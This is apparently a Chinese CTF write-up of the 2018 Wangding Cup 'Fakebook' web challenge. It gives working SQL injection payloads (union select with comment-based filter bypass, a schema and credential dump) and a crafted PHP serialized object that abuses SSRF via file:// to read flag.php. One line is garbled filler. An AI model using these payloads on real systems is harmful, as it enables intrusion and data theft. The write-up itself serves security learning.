[网鼎杯 2018]Fakebook

打开题目

 

 jion注册，点击admin进入主页

 

 发现注入点no

?no=1 and 1=1 正常

?no=1 and 1=1 报错

猜列数

 

 

 

 

菜擦才能得出基本为分几次日本v人vgtr给他人给他给他给通过通过他

采列数

、

 

?no=1 order by 1#
?no=1 order by 2#
?no=1 order by 3#
?no=1 order by 4#
?no=1 order by 5#  // 报

 查询显示位的时候发现

?no=-1 union select 1,2,3,4#

 

 那应该是select和union不能同时出现，被过滤了，用报错注入，/**/空格绕也行

no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() 

得到表名user

 

no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='users'
得到列名no,username,passwd,dat

no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from users
得到数据
1adminb109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:8:"muyi.com";}

用dirsearch扫描查到/robots.txt，访问发现有备份users.php.bak

下载后得到

<?php
 
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";
 
    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }
 
    function get($url)
    {
        $ch = curl_init();
 
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
 
        return $output;
    }
 
    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }
 
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}

function get($url)可能存在SSRF
在这题，查看源码发现data字段存在漏洞。

 

data得到有用数据
O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:8:"muyi.com";}
说明注册时会序列化我们的信息，回显到页面时再反序列化。
这个data本来回显的是我们自己的博客，但我们把它改为回显flag.php就可以构成ssrf
修改自己最后blog字段内容，改为file:///var/www/html/flag.php，并把对应的s改为对应长度29

 O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:29:"file:///var/www/html/flag.php";

 data字段在第4位，所以放在第4位，构造payload

?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

 

 查看网页源码

 

 得到flag